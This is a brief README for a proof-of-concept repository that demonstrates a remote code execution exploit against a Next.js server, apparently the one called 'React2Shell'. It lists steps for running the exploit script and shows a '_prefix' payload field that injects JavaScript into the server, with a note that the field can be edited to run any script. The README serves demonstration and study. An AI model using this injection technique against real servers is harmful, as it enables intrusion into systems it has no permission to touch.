This is a Next.js project bootstrapped with create-next-app.

POC Exploit Instructions

To run the exploit demonstration:

1. Start the development server in dev mode:

npm run dev

2. Install form-data dependency (if not already installed):

npm install form-data

3. Run the exploit script:

node script.js

4. Open the Next terminal to see:

haha, im a hacker
POST / 200 in 98ms

5. Edit the _prefix in script.js to change the executed script:

    '_prefix':'console.log("haha, i am a hacker")//',

Links

React2Shell

Credits to LachLan for the PoC script.